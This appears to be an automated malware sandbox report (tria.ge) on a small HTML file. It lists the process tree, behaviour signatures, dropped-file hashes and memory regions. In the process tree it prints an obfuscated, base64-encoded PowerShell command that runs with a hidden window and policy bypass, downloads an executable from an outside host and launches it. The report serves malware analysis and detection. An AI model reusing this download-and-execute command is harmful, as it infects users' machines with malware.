Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25/08/2024, 22:35

General

  • Target

    c1babb74037b3b0a205770526188e20d_JaffaCakes118.html

  • Size

    2KB

  • MD5

    c1babb74037b3b0a205770526188e20d

  • SHA1

    2b6e7ff7a5c511e45a2710c9d09d10dab3c5f478

  • SHA256

    f0ae5bd3bdbbe147fdcdb14d113a2af3295fed9a7470a314e5fbd9846937c655

  • SHA512

    54466affa623ff2fd887d2dc3b64344287a9f4163526cd00b550911d35af524a11ff2523f22896605cdf907b7120cb36fdc5362443ee138f7097d8e86178ad00

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\c1babb74037b3b0a205770526188e20d_JaffaCakes118.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2328 CREDAT:275457 /prefetch:2
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\SysWOW64\wIndowSPowERShELL\V1.0\POWeRSHeLL.eXE
        "C:\Windows\SYsteM32\wIndowSPowERShELL\V1.0\POWeRSHeLL.eXE" " pOWErsHeLL.exe -Ex bYPAss -NOp -w hIdden -EC IAAJACAAUwBlAFQALQBDAE8AbgBUAEUAbgBUACAAIAAJAC0AdgBhACAAIAAJACgAIAAJAAkATgBFAHcALQBvAEIAagBFAEMAVAAJAAsACQBTAHkAUwBUAGUATQAuAG4AZQB0AC4AdwBFAEIAYwBMAEkAZQBuAFQACQALACAAKQAuAGQAbwBXAG4ATABvAEEARABkAGEAVABBACgAIAAgACAAHSAgAGgAdAB0AHAAOgAvAC8AYwBkAG4AeABoAC4AbgBlAHQALwBzAHUAbgBkAGEAeQAvAGMAaABhAHIAbABlAHMALgBlAHgAZQAgAB0gCQAgACAAKQAJAAwAIAAtAEUATgAJACAACQBCAFkAdABlAAkADAAgAC0AUABBAHQAaAAJAAkACQAdICQARQBOAFYAOgBhAFAAcABkAGEAdABBAFwAcABlAG4AYQBsAHQAeQAuAGUAeABlAB0gIAAMACAAOwAJAAsACQBzAHQAQQBSAHQAIAAMAAkAHSAkAGUAbgB2ADoAYQBQAFAARABBAFQAYQBcAHAAZQBuAGEAbAB0AHkALgBlAHgAZQAdIA== "
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOp -w hIdden -EC IAAJACAAUwBlAFQALQBDAE8AbgBUAEUAbgBUACAAIAAJAC0AdgBhACAAIAAJACgAIAAJAAkATgBFAHcALQBvAEIAagBFAEMAVAAJAAsACQBTAHkAUwBUAGUATQAuAG4AZQB0AC4AdwBFAEIAYwBMAEkAZQBuAFQACQALACAAKQAuAGQAbwBXAG4ATABvAEEARABkAGEAVABBACgAIAAgACAAHSAgAGgAdAB0AHAAOgAvAC8AYwBkAG4AeABoAC4AbgBlAHQALwBzAHUAbgBkAGEAeQAvAGMAaABhAHIAbABlAHMALgBlAHgAZQAgAB0gCQAgACAAKQAJAAwAIAAtAEUATgAJACAACQBCAFkAdABlAAkADAAgAC0AUABBAHQAaAAJAAkACQAdICQARQBOAFYAOgBhAFAAcABkAGEAdABBAFwAcABlAG4AYQBsAHQAeQAuAGUAeABlAB0gIAAMACAAOwAJAAsACQBzAHQAQQBSAHQAIAAMAAkAHSAkAGUAbgB2ADoAYQBQAFAARABBAFQAYQBcAHAAZQBuAGEAbAB0AHkALgBlAHgAZQAdIA==
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    437c0dea0ef2d7af824873759260a1f6

    SHA1

    d31bf91ad742d20b717e5d24fbd8791210269aa9

    SHA256

    124431e47aac37486f30bd8eae572a010ef1c293d346cc7111b7fd828bf60d11

    SHA512

    b7781123efc9859dbf9cebbea2f8f1214d2bcebf462f599651cebafa735152709c53b0265ca752dd27fa7583f16bc91e4cae04b0de2772feca9db49438f3b3ec

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f281e82870e693c5f1a44b331bc8c3b9

    SHA1

    d9fa939133406361050150b2cf8a0c557445f805

    SHA256

    f9786b6e06058d2d7780def5e0ced1a270281dd136a7322a5fd26670cdfab8b9

    SHA512

    a1486c253a4dba1f158fead0f3d3cef3abdd0c4352a8cad89cd6d225655952618c0abc526bd11d2eac8f728dc6c5836b543aacc247d033fc7025f0051086b2df

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    01fb5dd8c19910669fda2890cdbd7a22

    SHA1

    fc34c08bb0e467d62c6b22ed4b0e892d92c5df5e

    SHA256

    bef9158e677824f75e85428768129a7c842d57d09a3d4d72f4fd2fc6ffcd835c

    SHA512

    039600fccb8f74ce85494f2c4b6f4e273b631d7b669ffc5c02f46cb4d49ae042609e6428a6e95d9f6e5469db27ad21c8fd844f210056cb29e8871c0db283fbd6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    753ad4b1de3a164209dc18d6bd76ec8f

    SHA1

    d5bd7fe832eb1444ffac19fc95e717716b6e04ca

    SHA256

    b13a6c82d7187c642f9fc971c33d42207c97bc1dfe4f537a233b0e6e3baf5800

    SHA512

    8f3fa758698c4c5c2aa73de3650419b94b5e09ff9a297178e39fd566deed8d156c30fa8cdd04b800629d9d600e7552eb648c0ccb33608be4762adb75318836cb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    eb5f5cd22d0a770299fc71597fbc32ce

    SHA1

    a1236efa28b0214075d6ca232658f6cc921bf6c7

    SHA256

    14b51173c704b49ad9baab5e95ad6306e5fe9106f2b36b625a13992c75744e4b

    SHA512

    bccaa80c5c904a11bb7c1822c07d8af7b209f61089be1dbc7649d6ab9f713778e7aa69d982f88b6bf45c73f4c36260972c02fadb073c21e08291ee16f278b513

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    540890ec17a52bb40941e04f8a3af90d

    SHA1

    3e329c70b1462d97b10fccdd2685ffbe11382479

    SHA256

    2f823ca5ff772f23a5da1b423887e0b46471f9e93e12e84d43f8b56c66ba0a40

    SHA512

    95248ce506458c297c58052f713480384944a88cd941ffc95cb456501541e42e3acbc92bc20f9ffcfea611dceaaa1111bcb481662f333cc55c85f51e8de4e8e9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    a56d49ef0544b4a22198b9bc85451e66

    SHA1

    d82b7a56350f3163c9ebbd1755a76dbda59cd71a

    SHA256

    162796183f8f9f0766d327c9502b34663ce55d73c3b6bdd9561ed3edfe3dedf4

    SHA512

    281d8357e5d55d01eb94d2e5b42b56c67c0db6866e7c42503ef6dd02b63c1479d41a2aec6da2391ea24c9d73223d4fe9603f8f3cb21ad79997a53f906c181fc9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    da62308007e382d0698ed85de99266e6

    SHA1

    9bbaf0dc04abbbc55d8feb40157d678540ecb8fc

    SHA256

    eb03ac14e49e88f4cdb310fb6cacaa43d162ac38953dba824f8fcafaca02fa53

    SHA512

    c87be0a3020b3034d8f6835a5518fea117030d5590ec9145aeff949457e59ab3027cb24fe411f48ae6be227f7c3451216082506dabd138c60b1a1fed0a366b72

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c53f47ddbd5c656f9ee818bc7f5df4cc

    SHA1

    36002c7755b1514164af9aa2343c0e0d6980ac3f

    SHA256

    acc761315cf18456b1d6d28577e58584b354a6a1c5c46904f4f33f92385dfc24

    SHA512

    8785180540859d351fa434544068bbd7e86c7da29c0ea62ded3cfb299c649cdc8d3647a57297cede41b6e013508386dea6e7ae74fabdab137bd04c15844ed2a5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    280ab1631d201d766637c85bd996aa1b

    SHA1

    0f4e641b87e1da2446a677ec688fdb7b83a43477

    SHA256

    d91185eb53b5adfe9ddbac7233d3c78bfa2db9f4a60e174d7aa67cd12b308cba

    SHA512

    a1ac47d6a419e68284df29a40b34906046618f3aadc608c5781b9cfe28cb44656ae11772016dc2a7991253b12dd89c22d279625aa60e920096f660b2b7b5845e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    04418abb789454f85bbe353603a41512

    SHA1

    19803dd5767c95835fd587d9660dec88d66ad84f

    SHA256

    b2083d623dece30676d48edaf5ea3ce9068389e883fc7a66fa1c0113fefd1500

    SHA512

    050e6deb751f1245b919f715802d92f9d3012fa6e1b9dfea792b433986c15aa834ebe8f71c6354ff02674fc0b6178ba98441733c705f4ae6c4d8eae531f041a7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2a750c013a6bdbd38cb97c1c65e94825

    SHA1

    8b610e13a02347964942d314493634f985ccb6c9

    SHA256

    804216e22ea9440a24ee482384a9096c143e0db0ca1af8bacd5fe7c14b14fd1c

    SHA512

    21b9603ecf0466d3e04609a931b130f61bc28f431ad3090ea8e3778eb5a8ef971072bbf05adef02977be53ec47bf467a1bebb96065f67ae33824409183c51619

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f19809743a5c61680bcba6b0ff098583

    SHA1

    478443f53a2a44883e3bb0b82414fc69f3aa0612

    SHA256

    814db9782142d5325a1cabe3d54493a0da298fbd79d71cf3e0cab22af1ae77f3

    SHA512

    b986da92fb86859c2f7d688714a98cbe7f22ca8dbd3020856c0415ed09cc30c5b853a2a49e0d2a9994be9afad650d42b0e02de3c7686d2f33448c3811098cd05

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    bd6dbbc1d27a9c72db22657bbe60aa32

    SHA1

    52a338a2efe385a6882038f1cc99de7cecc56453

    SHA256

    198b62681a586911f3ffa3bef66970ff8daca4f4176e44ca2ffda9341a81b738

    SHA512

    b3c47a066760ba6daf0507c6be578fb05bdd4604cdfdce7298ffb2be41508d7ef444cd2c567ac703fc1aa4576ecc26a8c9c51d60e55e69ab9f73c0b58f4af096

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ef138097c02f4153ba13bf7cde99f8da

    SHA1

    297ea8ad0111c317106edcf050ca6d4ba05b82e7

    SHA256

    43b54da27b3c57bc6fd4ddde9133a51322616260f54110fb1fd360ec3c835ed5

    SHA512

    d796015ac1bb9043af8b04bd14ae0b56182072953c1f25bf4b500f546e8bb2adabba77a8e1be71755cee07e3f4555fa14eac1ff14b28abd25fdd7df3faa1728e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    6187346085d1ea697336d5edcbef42aa

    SHA1

    8d005eeed07e0dec00a6bb40ee317ff893467acf

    SHA256

    b6ef655d1ab1afa20136e408bddf531e676a97e975e4c672f8065f24b1858f71

    SHA512

    e4be75a43157d97cc13ef4cdb224e44985aeb7c56ed7abc81e5fbbb4d8384ed1509f3fb69f6df2bcf6e427c65a238d9bff86882b8a2bff9e9239d33916db9888

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    6c454ce67c5e4df74b1d22d59a0a28c1

    SHA1

    4e94298a3782715da2d7f8297e97e08630bff9b9

    SHA256

    09952e0a2bd17da0a2b83b38277f1acebd51d459a258b6eee2bfad3c19e24f17

    SHA512

    8c6286270388fd80d570731b32fb47c892473d511e9b300b676f726c54608f14d805099223ddfca841942b67dc2a37737e938dce9b663f18f8186ef2dfb9bcc6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c105c87af1db9491af261c75e64b38b2

    SHA1

    fb09743b826e1af4b32fab7c45d68c60908ecb82

    SHA256

    2df5c1a7eb62cd210b36c2706b7d6a11a6115dac73ae3dce01452e1241980b7f

    SHA512

    007c73d646ef9433573d1bbbd1ae47c32ea1f62c9fe7361cac806769ec437543b19ab8ca1fe2f3f90cb89caace5ae3b6b4f37e62dedc219e13ec16fabd095665

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    73ea7a1736b448565a9fc211bc6cefe4

    SHA1

    ea6c3309c89d43ab78521c158caa7a909e13f03a

    SHA256

    acd7d3163c5b5b2ffd190c5ad14f377b7ada9dc73070cc7aed287438b518034f

    SHA512

    f33f45a7c31bf0cc387086da4085d5bde6350aa88adadb48675f6c7cdac7a74c7495c00bd0994a538d93b46a4853b9daac0e2ce0013d240256e8e25d0b159c49

  • C:\Users\Admin\AppData\Local\Temp\Cab2E06.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar2EA5.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    4236d487f61cad4320133d560dff1fea

    SHA1

    7de85372365568debffbe8a6c617e3b39c5afa0a

    SHA256

    97688e74a30013d01e9ee8de79d4eb972085031221af6f4d1ea7768536b172e1

    SHA512

    c947daffdbca7eebf42339c41a62a2945e28e684ab771e93b040d54618bad1099854d8ef9cff61c1b8d53b385388f65feb9ac4b1ec54de19467cdb8d5e9c9778

  • memory/2748-4-0x0000000071D80000-0x000000007232B000-memory.dmp

    Filesize

    5.7MB

  • memory/2748-2-0x0000000071D81000-0x0000000071D82000-memory.dmp

    Filesize

    4KB

  • memory/2748-3-0x0000000071D80000-0x000000007232B000-memory.dmp

    Filesize

    5.7MB

  • memory/2748-6-0x0000000071D80000-0x000000007232B000-memory.dmp

    Filesize

    5.7MB

  • memory/2748-5-0x0000000071D80000-0x000000007232B000-memory.dmp

    Filesize

    5.7MB

  • memory/2748-14-0x0000000071D80000-0x000000007232B000-memory.dmp

    Filesize

    5.7MB

  • memory/2904-12-0x0000000071D80000-0x000000007232B000-memory.dmp

    Filesize

    5.7MB

  • memory/2904-13-0x0000000071D80000-0x000000007232B000-memory.dmp

    Filesize

    5.7MB